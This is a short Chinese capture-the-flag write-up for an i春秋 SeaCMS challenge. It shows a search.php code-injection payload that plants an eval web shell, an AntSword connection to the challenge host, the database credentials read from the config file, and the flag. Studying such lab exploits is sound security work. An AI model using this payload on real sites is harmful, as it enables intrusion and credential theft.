i春秋-Test

题目


解题

参考WP

复制代码
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
神经毒素5 小时前
WEB安全--Java安全--shiro721反序列化漏洞
安全·web安全
2501_915909067 小时前
我用 Appuploader绕过 Mac,成功把 iOS 应用上线了 App Store
websocket·网络协议·tcp/ip·http·网络安全·https·udp
DourPanda12 小时前
polarctf-web-[rce1]
linux·网络协议·网络安全
事业运财运爆棚13 小时前
中exec()函数因$imagePath参数导致的命令注入漏洞
web安全
shenyan~16 小时前
关于 Web安全:1. Web 安全基础知识
安全·web安全
若初&19 小时前
文件上传Ⅲ
前端·web安全
禾木KG21 小时前
网络安全-等级保护(等保) 2-5-1 GB/T 25070—2019 附录B (资料性附录)第三级系统安全保护环境设计示例
网络安全
云手机管家21 小时前
账号风控突破:云手机设备指纹篡改检测与反制技术解析
android·运维·网络协议·网络安全·智能手机·矩阵·自动化
雪兽软件1 天前
2025 年十大网络安全预测
web安全·数据安全
木下-俱欢颜1 天前
搭建基于chrony+OpenSSL(NTS协议)多层级可信时间同步服务
运维·网络安全·udp·ssl